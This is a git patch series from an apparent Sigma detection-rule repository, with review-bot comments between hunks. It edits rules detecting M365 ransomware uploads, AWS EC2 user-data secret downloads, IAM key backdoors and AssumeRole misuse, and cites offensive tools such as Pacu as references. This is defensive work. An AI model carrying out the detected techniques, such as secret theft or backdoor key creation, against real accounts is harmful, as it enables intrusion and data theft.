+falsepositives:
+ -
+level: medium
+tags:
+ - attack.impact
+ - attack.t1486
From 54bda9068501feecb226e6c417eb6dc316295b6a Mon Sep 17 00:00:00 2001
From: Austin Songer
Date: Thu, 19 Aug 2021 23:08:25 -0500
Subject: [PATCH 0463/1367] Create microsoft365_user_restricted_from_sending_email.yml
---
 ...365_user_restricted_from_sending_email.yml | 24 +++++++++++++++++++
 1 file changed, 24 insertions(+)
 create mode 100644 rules/cloud/m365/microsoft365_user_restricted_from_sending_email.yml
diff --git a/rules/cloud/m365/microsoft365_user_restricted_from_sending_email.yml b/rules/cloud/m365/microsoft365_user_restricted_from_sending_email.yml
new file mode 100644
index 00000000..355ee3c1
--- /dev/null
+++ b/rules/cloud/m365/microsoft365_user_restricted_from_sending_email.yml
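Review bot: The description of the new microsoft365_potential_ransomware_activity.yml has a doubled "when" and reads awkwardly; `description: Detects when Microsoft Cloud App Security reports that a user uploaded files to the cloud that might be infected with ransomware.` says the same thing cleanly. As in the previous hunk, `author: austinsonger` does not follow the `Austin Songer @austinsonger` form used across the rest of the series.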
@@ -0,0 +1,24 @@
+title: Microsoft 365 - User Restricted from Sending Email
+id: ff246f56-7f24-402a-baca-b86540e3925c
+status: experimental
+description: Detects when a Security Compliance Center reported a user who exceeded sending limits of the service policies and because of this has been restricted from sending email.
+author: austinsonger
+date: 2021/08/19
+references:
+ - https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy
+ - https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference
+logsource:
+ category: ThreatManagement
+ service: Office365
+detection:
+ selection:
+ eventSource: SecurityComplianceCenter
+ eventName: "User restricted from sending email"
+ status: success
+ condition: selection
+falsepositives:
+ -
+level: medium
+tags:
+ - attack.initial_access
+ - attack.t1199
From f882ebda35ca52e8f05e256119decc5a8befcd77 Mon Sep 17 00:00:00 2001
From: frack113 <62423083+frack113@users.noreply.github.com>
Date: Fri, 20 Aug 2021 06:08:28 +0200
Subject: [PATCH 0464/1367] fix status
---
 rules/cloud/azure/azure_kubernetes_pods_deleted.yml | 9 +++++----
 1 file changed, 5 insertions(+), 4 deletions(-)
diff --git a/rules/cloud/azure/azure_kubernetes_pods_deleted.yml b/rules/cloud/azure/azure_kubernetes_pods_deleted.yml
index 0e89293e..4f7d6b9b 100644
--- a/rules/cloud/azure/azure_kubernetes_pods_deleted.yml
+++ b/rules/cloud/azure/azure_kubernetes_pods_deleted.yml
@@ -1,8 +1,8 @@
 title: Azure Kubernetes Pods Deleted
 id: b02f9591-12c3-4965-986a-88028629b2e1
 description: Identifies the deletion of Azure Kubernetes Pods.
-author: Austin Songer
-status: experimental @austinsonger
+author: Austin Songer @austinsonger
+status: experimental
 date: 2021/07/24
 references:
 - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes
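Review bot: The ATT&CK mapping on the new microsoft365_user_restricted_from_sending_email.yml looks off: `attack.initial_access` / `attack.t1199` is Trusted Relationship (third-party access), whereas a mailbox being throttled for exceeding sending limits is the usual symptom of a compromised account sending bulk mail, so a technique in that area (for instance `attack.t1078` Valid Accounts) seems a closer fit — worth confirming against the ATT&CK entries before merging. The description would also read better as `description: Detects when the Security Compliance Center reports that a user exceeded the service's sending limits and was restricted from sending email.`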
@@ -12,9 +12,10 @@ logsource: detection: selection_operation_name: properties.message: MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/PODS/DELETE - condition: selection_operation_name + condition: selection_operation_name level: medium tags: - attack.impact falsepositives: -- Pods may be deleted by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Pods deletions from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule. +- Pods may be deleted by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. +- Pods deletions from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule. From b89910a38a41dc5848815b01cbf22074fda69127 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Thu, 19 Aug 2021 23:09:38 -0500 Subject: [PATCH 0465/1367] Update aws_eks_cluster_created_or_deleted.yml --- rules/cloud/aws/aws_eks_cluster_created_or_deleted.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/cloud/aws/aws_eks_cluster_created_or_deleted.yml b/rules/cloud/aws/aws_eks_cluster_created_or_deleted.yml index a5885858..342d5744 100644 --- a/rules/cloud/aws/aws_eks_cluster_created_or_deleted.yml +++ b/rules/cloud/aws/aws_eks_cluster_created_or_deleted.yml @@ -1,7 +1,7 @@ title: AWS EKS Cluster Created or Deleted id: 33d50d03-20ec-4b74-a74e-1e65a38af1c0 description: Identifies when an EKS cluster is created or deleted. -author: Austin Songer @austinsonger +author: Austin Songer status: experimental date: 2021/08/16 references: From bcb43cf728ecae217de87f05aac7cbad7457744b Mon Sep 17 00:00:00 2001 
From: Austin Songer Date: Thu, 19 Aug 2021 23:13:06 -0500 Subject: [PATCH 0466/1367] Update aws_eks_cluster_created_or_deleted.yml --- rules/cloud/aws/aws_eks_cluster_created_or_deleted.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/cloud/aws/aws_eks_cluster_created_or_deleted.yml b/rules/cloud/aws/aws_eks_cluster_created_or_deleted.yml index a5885858..342d5744 100644 --- a/rules/cloud/aws/aws_eks_cluster_created_or_deleted.yml +++ b/rules/cloud/aws/aws_eks_cluster_created_or_deleted.yml @@ -1,7 +1,7 @@ title: AWS EKS Cluster Created or Deleted id: 33d50d03-20ec-4b74-a74e-1e65a38af1c0 description: Identifies when an EKS cluster is created or deleted. -author: Austin Songer @austinsonger +author: Austin Songer status: experimental date: 2021/08/16 references: From 42fbc0cbfc88644c4a90b92879933f6327238f5f Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Thu, 19 Aug 2021 23:13:35 -0500 Subject: [PATCH 0467/1367] Update aws_eks_cluster_created_or_deleted.yml --- rules/cloud/aws/aws_eks_cluster_created_or_deleted.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/cloud/aws/aws_eks_cluster_created_or_deleted.yml b/rules/cloud/aws/aws_eks_cluster_created_or_deleted.yml index a5885858..342d5744 100644 --- a/rules/cloud/aws/aws_eks_cluster_created_or_deleted.yml +++ b/rules/cloud/aws/aws_eks_cluster_created_or_deleted.yml @@ -1,7 +1,7 @@ title: AWS EKS Cluster Created or Deleted id: 33d50d03-20ec-4b74-a74e-1e65a38af1c0 description: Identifies when an EKS cluster is created or deleted. -author: Austin Songer @austinsonger +author: Austin Songer status: experimental date: 2021/08/16 references: From e6457531dd4af505af7b5b5f85f8800ade3e2b45 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Fri, 20 Aug 2021 00:29:29 -0500 Subject: [PATCH 0468/1367] Create m365.yml --- tools/config/generic/m365.yml | 7 +++++++ 1 file changed, 7 insertions(+) create mode 100644 tools/config/generic/m365.yml 
diff --git a/tools/config/generic/m365.yml b/tools/config/generic/m365.yml
new file mode 100644
index 00000000..51e08af6
--- /dev/null
+++ b/tools/config/generic/m365.yml
@@ -0,0 +1,7 @@
+title: Microsoft 365 Rules
+order: 10
+ThreatManagement:
+ product: m365
+ category: ThreatManagement
+ conditions:
+ eventSource: SecurityComplianceCenter
From f745593e806e7aca2a8ef826344f42825bdc931b Mon Sep 17 00:00:00 2001
From: Austin Songer
Date: Fri, 20 Aug 2021 00:33:42 -0500
Subject: [PATCH 0469/1367] Update microsoft365_potential_ransomware_activity.yml
---
 rules/cloud/m365/microsoft365_potential_ransomware_activity.yml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/rules/cloud/m365/microsoft365_potential_ransomware_activity.yml b/rules/cloud/m365/microsoft365_potential_ransomware_activity.yml
index 213f0ee5..818af562 100644
--- a/rules/cloud/m365/microsoft365_potential_ransomware_activity.yml
+++ b/rules/cloud/m365/microsoft365_potential_ransomware_activity.yml
@@ -17,7 +17,7 @@ detection:
 status: success
 condition: selection
 falsepositives:
- -
+ - Unknown
 level: medium
 tags:
 - attack.impact
From 853c2eb41d94233419b47d671f37157b9326877c Mon Sep 17 00:00:00 2001
From: Austin Songer
Date: Fri, 20 Aug 2021 01:19:01 -0500
Subject: [PATCH 0470/1367] Update microsoft365_potential_ransomware_activity.yml
---
 rules/cloud/m365/microsoft365_potential_ransomware_activity.yml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/rules/cloud/m365/microsoft365_potential_ransomware_activity.yml b/rules/cloud/m365/microsoft365_potential_ransomware_activity.yml
index 818af562..664eae25 100644
--- a/rules/cloud/m365/microsoft365_potential_ransomware_activity.yml
+++ b/rules/cloud/m365/microsoft365_potential_ransomware_activity.yml
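Review bot: The new tools/config/generic/m365.yml puts `ThreatManagement:` at the top level of the file, but sigmac reads logsource definitions from a `logsources:` mapping, so as written this entry is most likely never consulted; nest it as `logsources:` / `  ThreatManagement:` / `    product: m365` (and the rest beneath). Two further things to check once it is picked up: the entry requires `product: m365`, while the m365 rules introduced earlier in this series declare only `category: ThreatManagement` and `service: Office365`, so the match may still not fire; and its `conditions: eventSource: SecurityComplianceCenter` duplicates the `eventSource` those rules already select on, producing a redundant clause in every generated query. Keep the eventSource constraint in one place — the config or the rules — not both.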
@@ -1,7 +1,7 @@ title: Microsoft 365 - Potential ransomware activity id: bd132164-884a-48f1-aa2d-c6d646b04c69 status: experimental -description: Detects when a Microsoft Cloud App Security reported when a user uploads files to the cloud that might be infected with ransomware. +description: Detects when a Microsoft Cloud App Security reported when a user uploads files to the cloud that might be infected with ransomware. author: austinsonger date: 2021/08/19 references: From 4e29dc9c45d8802c81b119d3fc5ca8d06e2e9e28 Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Fri, 20 Aug 2021 09:06:16 +0200 Subject: [PATCH 0471/1367] fix title --- rules/cloud/m365/microsoft365_potential_ransomware_activity.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/cloud/m365/microsoft365_potential_ransomware_activity.yml b/rules/cloud/m365/microsoft365_potential_ransomware_activity.yml index 664eae25..a0d99b41 100644 --- a/rules/cloud/m365/microsoft365_potential_ransomware_activity.yml +++ b/rules/cloud/m365/microsoft365_potential_ransomware_activity.yml @@ -1,4 +1,4 @@ -title: Microsoft 365 - Potential ransomware activity +title: Microsoft 365 - Potential Ransomware Activity id: bd132164-884a-48f1-aa2d-c6d646b04c69 status: experimental description: Detects when a Microsoft Cloud App Security reported when a user uploads files to the cloud that might be infected with ransomware. From 4e895da471f221aff0ed5f94db6c622bb00634e3 Mon Sep 17 00:00:00 2001 From: frack113 Date: Fri, 20 Aug 2021 09:20:56 +0200 Subject: [PATCH 0472/1367] fix error "has no len()" --- tools/sigma/backends/base.py | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/tools/sigma/backends/base.py b/tools/sigma/backends/base.py index 08d29b4b..469c0648 100644 --- a/tools/sigma/backends/base.py +++ b/tools/sigma/backends/base.py 
@@ -277,9 +277,10 @@ class SingleTextQueryBackend(RulenameCommentMixin, BaseBackend, QuoteCharMixin): def generateSubexpressionNode(self, node): generated = self.generateNode(node.items) - if len(node.items) == 1: - # A sub expression with length 1 is not a proper sub expression, no self.subExpression required - return generated + if 'len'in dir(node.items): # fix the "TypeError: object of type 'NodeSubexpression' has no len()" + if len(node.items) == 1: + # A sub expression with length 1 is not a proper sub expression, no self.subExpression required + return generated if generated: return self.subExpression % generated else: From f6fe5e7d02e0644c0fb89f51fdee5d5fd8ee8dcc Mon Sep 17 00:00:00 2001 From: frack113 Date: Fri, 20 Aug 2021 13:58:57 +0200 Subject: [PATCH 0473/1367] fix when backend support error --- tools/sigma/sigma_similarity.py | 18 ++++++++++++++---- 1 file changed, 14 insertions(+), 4 deletions(-) diff --git a/tools/sigma/sigma_similarity.py b/tools/sigma/sigma_similarity.py index ad911c57..68e7d49b 100755 --- a/tools/sigma/sigma_similarity.py +++ b/tools/sigma/sigma_similarity.py @@ -72,10 +72,20 @@ def main(): str(path): SigmaCollectionParser(path.open(encoding='utf-8').read()) for path in paths } - converted = { - str(path): list(sigma_collection.generate(backend)) - for path, sigma_collection in parsed.items() - } + + # converted = { + # str(path): list(sigma_collection.generate(backend)) + # for path, sigma_collection in parsed.items() + # } + converted = {} + for path, sigma_collection in parsed.items(): + try: + value = list(sigma_collection.generate(backend)) + key = str(path) + converted[key] = value + except : + continue #when Raise NotImplementedError: Base backend doesn't support multiple conditions + converted_flat = ( (path, i, normalized) for path, nlist in converted.items() From 7ebd41119087734bb69350637ab43834d77f148f Mon Sep 17 00:00:00 2001 
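Review bot: The new guard `if 'len'in dir(node.items):` is always false for the cases it is meant to protect: `dir()` of a list or tuple contains `__len__`, not `len`, so unless one of the node classes defines an attribute literally named `len` the single-item shortcut below it is now dead code and every one-element subexpression gets wrapped in `self.subExpression` — which is a behaviour change, not just a crash fix. Replace the two lines with `if isinstance(node.items, (list, tuple)) and len(node.items) == 1:` (or `hasattr(node.items, '__len__')`), which preserves the original shortcut while still skipping a bare `NodeSubexpression`. Fixing the spacing in `'len'in` at the same time would help readability. The rest of `generateSubexpressionNode` is visible here; the enclosing class starts outside the hunk.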
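Review bot: The bare `except :` added around `sigma_collection.generate(backend)` swallows every exception, including `KeyboardInterrupt`, `SystemExit` and genuine backend bugs, and silently drops the rule from the similarity set with no trace of what was skipped. The comment names the one case that is expected, so catch exactly that: `except NotImplementedError:` followed by a message naming `path` (to stderr if `sys` is in scope) before `continue`. The commented-out dict comprehension above the loop should be deleted rather than left in place; the diff already records the old form. `main()` continues outside the hunk.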
From: frack113 Date: Fri, 20 Aug 2021 14:22:17 +0200 Subject: [PATCH 0474/1367] update ref from conti_leak --- rules/windows/builtin/win_software_discovery.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/rules/windows/builtin/win_software_discovery.yml b/rules/windows/builtin/win_software_discovery.yml index d1c815ee..b68643c6 100644 --- a/rules/windows/builtin/win_software_discovery.yml +++ b/rules/windows/builtin/win_software_discovery.yml @@ -7,6 +7,7 @@ author: Nikita Nazarov, oscd.community date: 2020/10/16 references: - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md + - https://github.com/harleyQu1nn/AggressorScripts #AVQuery.cna tags: - attack.discovery - attack.t1518 @@ -19,6 +20,7 @@ detection: logsource: product: windows service: powershell + definition: 'Script block logging must be enabled' detection: selection: EventID: 4104 From f09b3ea4b18842866b9f2e007e9340649b275730 Mon Sep 17 00:00:00 2001 
From: Rachel Rice Date: Fri, 20 Aug 2021 13:43:00 +0100 Subject: [PATCH 0475/1367] Update AWS CloudTrail rules aws_ec2_disable_encryption.yml Remove `status: success` from selection criteria, not required aws_ec2_vm_export_failure.yml Remove filter3: ``` eventName: 'ConsoleLogin' responseElements|contains: 'Failure' ``` Incompatible with selection criteria `eventName: 'CreateInstanceExportTask'` aws_ec2_download_userdata.yml, aws_iam_backdoor_users_keys.yml, aws_rds_change_master_password.yml, aws_rds_public_db_restore.yml Update reference aws_sts_assumedrole_misuse.yml Rename to aws_sts_assumerole_misuse.yml Update references to "AssumedRole" to "AssumeRole" Update selection criteria of `userIdentity.sessionContext: Role` to `userIdentity.sessionContext.sessionIssuer.type: Role` --- rules/cloud/aws/aws_ec2_disable_encryption.yml | 3 +-- rules/cloud/aws/aws_ec2_download_userdata.yml | 4 ++-- rules/cloud/aws/aws_ec2_vm_export_failure.yml | 6 ++---- rules/cloud/aws/aws_iam_backdoor_users_keys.yml | 4 ++-- rules/cloud/aws/aws_rds_change_master_password.yml | 4 ++-- rules/cloud/aws/aws_rds_public_db_restore.yml | 4 ++-- ...drole_misuse.yml => aws_sts_assumerole_misuse.yml} | 11 ++++++----- 7 files changed, 17 insertions(+), 19 deletions(-) rename rules/cloud/aws/{aws_sts_assumedrole_misuse.yml => aws_sts_assumerole_misuse.yml} (51%) diff --git a/rules/cloud/aws/aws_ec2_disable_encryption.yml b/rules/cloud/aws/aws_ec2_disable_encryption.yml index ea7330a3..e383c949 100644 --- a/rules/cloud/aws/aws_ec2_disable_encryption.yml +++ b/rules/cloud/aws/aws_ec2_disable_encryption.yml 
@@ -4,7 +4,7 @@ status: stable description: Identifies disabling of default Amazon Elastic Block Store (EBS) encryption in the current region. Disabling default encryption does not change the encryption status of your existing volumes. author: Sittikorn S date: 2021/06/29 -modified: 2021/08/09 +modified: 2021/08/20 references: - https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DisableEbsEncryptionByDefault.html tags: @@ -17,7 +17,6 @@ detection: selection: eventSource: ec2.amazonaws.com eventName: DisableEbsEncryptionByDefault - status: success condition: selection falsepositives: - System Administrator Activities diff --git a/rules/cloud/aws/aws_ec2_download_userdata.yml b/rules/cloud/aws/aws_ec2_download_userdata.yml index 073bdf6b..be6b7438 100644 --- a/rules/cloud/aws/aws_ec2_download_userdata.yml +++ b/rules/cloud/aws/aws_ec2_download_userdata.yml @@ -4,9 +4,9 @@ status: experimental description: Detects bulk downloading of User Data associated with AWS EC2 instances. Instance User Data may include installation scripts and hard-coded secrets for deployment. author: faloker date: 2020/02/11 -modified: 2021/08/09 +modified: 2021/08/20 references: - - https://github.com/RhinoSecurityLabs/pacu/blob/master/modules/ec2__download_userdata/main.py#L24 + - https://github.com/RhinoSecurityLabs/pacu/blob/master/pacu/modules/ec2__download_userdata/main.py logsource: service: cloudtrail detection: diff --git a/rules/cloud/aws/aws_ec2_vm_export_failure.yml b/rules/cloud/aws/aws_ec2_vm_export_failure.yml index dff7a078..2fed0c66 100644 --- a/rules/cloud/aws/aws_ec2_vm_export_failure.yml +++ b/rules/cloud/aws/aws_ec2_vm_export_failure.yml 
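Review bot: Dropping `status: success` from the DisableEbsEncryptionByDefault selection looks correct — a CloudTrail record carries `errorCode`/`errorMessage` rather than a `status` field (as the export-failure rule in this same patch relies on), so the old selection presumably never matched at all. The side effect is that the rule now also fires on denied attempts, which is a useful signal but not what the description ("Identifies disabling of default … encryption") states; either add `filter: errorCode: '*'` with `condition: selection and not filter`, or extend the description to say that failed attempts alert too.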
@@ -4,6 +4,7 @@ status: experimental description: An attempt to export an AWS EC2 instance has been detected. A VM Export might indicate an attempt to extract information from an instance. author: Diogo Braz date: 2020/04/16 +modified: 2021/08/20 references: - https://docs.aws.amazon.com/vm-import/latest/userguide/vmexport.html#export-instance logsource: @@ -16,10 +17,7 @@ detection: errorMessage: '*' filter2: errorCode: '*' - filter3: - eventName: 'ConsoleLogin' - responseElements|contains: 'Failure' - condition: selection and (filter1 or filter2 or filter3) + condition: selection and (filter1 or filter2) level: low tags: - attack.collection diff --git a/rules/cloud/aws/aws_iam_backdoor_users_keys.yml b/rules/cloud/aws/aws_iam_backdoor_users_keys.yml index 2af725c8..7991b3ae 100644 --- a/rules/cloud/aws/aws_iam_backdoor_users_keys.yml +++ b/rules/cloud/aws/aws_iam_backdoor_users_keys.yml @@ -4,9 +4,9 @@ status: experimental description: Detects AWS API key creation for a user by another user. Backdoored users can be used to obtain persistence in the AWS environment. Also with this alert, you can detect a flow of AWS keys in your org. author: faloker date: 2020/02/12 -modified: 2021/08/09 +modified: 2021/08/20 references: - - https://github.com/RhinoSecurityLabs/pacu/blob/master/modules/iam__backdoor_users_keys/main.py#L6 + - https://github.com/RhinoSecurityLabs/pacu/blob/master/pacu/modules/iam__backdoor_users_keys/main.py logsource: service: cloudtrail detection: diff --git a/rules/cloud/aws/aws_rds_change_master_password.yml b/rules/cloud/aws/aws_rds_change_master_password.yml index 4204cbaf..cfdfb70a 100644 --- a/rules/cloud/aws/aws_rds_change_master_password.yml +++ b/rules/cloud/aws/aws_rds_change_master_password.yml 
@@ -4,9 +4,9 @@ status: experimental description: Detects the change of database master password. It may be a part of data exfiltration. author: faloker date: 2020/02/12 -modified: 2021/08/09 +modified: 2021/08/20 references: - - https://github.com/RhinoSecurityLabs/pacu/blob/master/modules/rds__explore_snapshots/main.py#L10 + - https://github.com/RhinoSecurityLabs/pacu/blob/master/pacu/modules/rds__explore_snapshots/main.py logsource: service: cloudtrail detection: diff --git a/rules/cloud/aws/aws_rds_public_db_restore.yml b/rules/cloud/aws/aws_rds_public_db_restore.yml index 41497778..fdc8c19d 100644 --- a/rules/cloud/aws/aws_rds_public_db_restore.yml +++ b/rules/cloud/aws/aws_rds_public_db_restore.yml @@ -4,9 +4,9 @@ status: experimental description: Detects the recovery of a new public database instance from a snapshot. It may be a part of data exfiltration. author: faloker date: 2020/02/12 -modified: 2021/08/09 +modified: 2021/08/20 references: - - https://github.com/RhinoSecurityLabs/pacu/blob/master/modules/rds__explore_snapshots/main.py#L10 + - https://github.com/RhinoSecurityLabs/pacu/blob/master/pacu/modules/rds__explore_snapshots/main.py logsource: service: cloudtrail detection: diff --git a/rules/cloud/aws/aws_sts_assumedrole_misuse.yml b/rules/cloud/aws/aws_sts_assumerole_misuse.yml similarity index 51% rename from rules/cloud/aws/aws_sts_assumedrole_misuse.yml rename to rules/cloud/aws/aws_sts_assumerole_misuse.yml index 2e9d22f4..3bc5af7f 100644 --- a/rules/cloud/aws/aws_sts_assumedrole_misuse.yml +++ b/rules/cloud/aws/aws_sts_assumerole_misuse.yml 
@@ -1,9 +1,10 @@ -title: AWS STS AssumedRole Misuse +title: AWS STS AssumeRole Misuse id: 905d389b-b853-46d0-9d3d-dea0d3a3cd49 -description: Identifies the suspicious use of AssumedRole. Attackers could move laterally and escalate privileges. +description: Identifies the suspicious use of AssumeRole. Attackers could move laterally and escalate privileges. author: Austin Songer @austinsonger status: experimental date: 2021/07/24 +modified: 2021/08/20 references: - https://github.com/elastic/detection-rules/pull/1214 - https://docs.aws.amazon.com/STS/latest/APIReference/API_AssumeRole.html @@ -12,8 +13,8 @@ logsource: detection: selection: eventSource: sts.amazonaws.com - eventName: AssumedRole - userIdentity.sessionContext: Role + eventName: AssumeRole + userIdentity.sessionContext.sessionIssuer.type: Role condition: selection level: low tags: @@ -23,5 +24,5 @@ tags: - attack.t1550 - attack.t1550.001 falsepositives: - - AssumedRole may be done by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. AssumedRole from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule. + - AssumeRole may be done by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. AssumeRole from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule. - Automated processes that uses Terraform may lead to false positives. From ae368049357d532fca2343edf69ab75310f29deb Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Fri, 20 Aug 2021 08:16:48 -0500 Subject: [PATCH 0476/1367] Update microsoft365_user_restricted_from_sending_email.yml --- .../m365/microsoft365_user_restricted_from_sending_email.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) 
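Review bot: The corrected selection (`eventName: AssumeRole` with `userIdentity.sessionContext.sessionIssuer.type: Role`) now matches every role-chaining call, which in accounts using CI/CD, cross-account or instance roles is continuous background volume, and the rule offers no hook to carve that out beyond the `level: low`. Consider a `filter` on `userIdentity.sessionContext.sessionIssuer.arn|contains` for known automation roles with `condition: selection and not filter`, and document in `falsepositives` that the filter is expected to be tuned per account. A second selection on `errorCode: AccessDenied` for AssumeRole would, as far as I recall CloudTrail's behaviour, isolate the failed attempts that are the more direct lateral-movement signal — worth confirming.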
diff --git a/rules/cloud/m365/microsoft365_user_restricted_from_sending_email.yml b/rules/cloud/m365/microsoft365_user_restricted_from_sending_email.yml index 355ee3c1..b969efec 100644 --- a/rules/cloud/m365/microsoft365_user_restricted_from_sending_email.yml +++ b/rules/cloud/m365/microsoft365_user_restricted_from_sending_email.yml @@ -9,7 +9,7 @@ references: - https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference logsource: category: ThreatManagement - service: Office365 + service: Microsoft365 detection: selection: eventSource: SecurityComplianceCenter From 360b93635706029072c2a2411905ebcef008aaee Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Fri, 20 Aug 2021 08:17:09 -0500 Subject: [PATCH 0477/1367] Update microsoft365_potential_ransomware_activity.yml --- rules/cloud/m365/microsoft365_potential_ransomware_activity.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/cloud/m365/microsoft365_potential_ransomware_activity.yml b/rules/cloud/m365/microsoft365_potential_ransomware_activity.yml index a0d99b41..b5571ef9 100644 --- a/rules/cloud/m365/microsoft365_potential_ransomware_activity.yml +++ b/rules/cloud/m365/microsoft365_potential_ransomware_activity.yml @@ -9,7 +9,7 @@ references: - https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference logsource: category: ThreatManagement - service: Office365 + service: Microsoft365 detection: selection: eventSource: SecurityComplianceCenter From a25f6e196fa1396380b484367f74334171b1ab52 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Fri, 20 Aug 2021 08:17:25 -0500 Subject: [PATCH 0478/1367] Update microsoft365_unusual_volume_of_file_deletion.yml --- .../cloud/m365/microsoft365_unusual_volume_of_file_deletion.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/cloud/m365/microsoft365_unusual_volume_of_file_deletion.yml b/rules/cloud/m365/microsoft365_unusual_volume_of_file_deletion.yml index 82cea96d..53bbf8ff 100644 
--- a/rules/cloud/m365/microsoft365_unusual_volume_of_file_deletion.yml +++ b/rules/cloud/m365/microsoft365_unusual_volume_of_file_deletion.yml @@ -9,7 +9,7 @@ references: - https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference logsource: category: ThreatManagement - service: Office365 + service: Microsoft365 detection: selection: eventSource: SecurityComplianceCenter From f037f5b0a928bacc97ebf991e9cbbc0e47103be3 Mon Sep 17 00:00:00 2001 From: Rachel Rice Date: Fri, 20 Aug 2021 15:42:49 +0100 Subject: [PATCH 0479/1367] Add filter3 back for vm export failure, without consolelogin Signed-off-by: Rachel Rice --- rules/cloud/aws/aws_ec2_vm_export_failure.yml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/rules/cloud/aws/aws_ec2_vm_export_failure.yml b/rules/cloud/aws/aws_ec2_vm_export_failure.yml index 2fed0c66..05baed24 100644 --- a/rules/cloud/aws/aws_ec2_vm_export_failure.yml +++ b/rules/cloud/aws/aws_ec2_vm_export_failure.yml @@ -17,7 +17,9 @@ detection: errorMessage: '*' filter2: errorCode: '*' - condition: selection and (filter1 or filter2) + filter3: + responseElements|contains: 'Failure' + condition: selection and (filter1 or filter2 or filter3) level: low tags: - attack.collection From b9a355e3f428906023a78ca6678491890477d0be Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Fri, 20 Aug 2021 17:18:32 +0200 Subject: [PATCH 0480/1367] cleanup falsepositives --- rules/cloud/aws/aws_sts_assumerole_misuse.yml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/rules/cloud/aws/aws_sts_assumerole_misuse.yml b/rules/cloud/aws/aws_sts_assumerole_misuse.yml index 3bc5af7f..f7464612 100644 --- a/rules/cloud/aws/aws_sts_assumerole_misuse.yml +++ b/rules/cloud/aws/aws_sts_assumerole_misuse.yml 
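Review bot: The re-added `filter3: responseElements|contains: 'Failure'` on the VM export rule depends on the backend flattening `responseElements`, which is a nested JSON object in CloudTrail, into a searchable string; on backends that keep it as an object the clause silently never matches. Since it is OR-ed with `errorMessage: '*'` and `errorCode: '*'`, and a failed `CreateInstanceExportTask` call already carries `errorCode`, the clause adds little beyond backend-dependent behaviour — state in the description which backend it was validated against, or drop it again. Naming these OR-ed alternatives `filter1..3` is also misleading, since Sigma filters conventionally denote exclusions; `selection_error_*` would read more honestly.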
@@ -24,5 +24,6 @@ tags: - attack.t1550 - attack.t1550.001 falsepositives: - - AssumeRole may be done by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. AssumeRole from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule. + - AssumeRole may be done by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - AssumeRole from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule. - Automated processes that uses Terraform may lead to false positives. From cb95582077c675b9fc47a389bb93f3cefcbd8ce8 Mon Sep 17 00:00:00 2001 From: frack113 Date: Sat, 21 Aug 2021 09:08:38 +0200 Subject: [PATCH 0481/1367] Update PowerShell rule --- .../powershell_malicious_keywords.yml | 47 ++++++++++--------- ...wershell_nishang_malicious_commandlets.yml | 11 +++-- 2 files changed, 31 insertions(+), 27 deletions(-) diff --git a/rules/windows/powershell/powershell_malicious_keywords.yml b/rules/windows/powershell/powershell_malicious_keywords.yml index 03858d39..071f3725 100644 --- a/rules/windows/powershell/powershell_malicious_keywords.yml +++ b/rules/windows/powershell/powershell_malicious_keywords.yml 
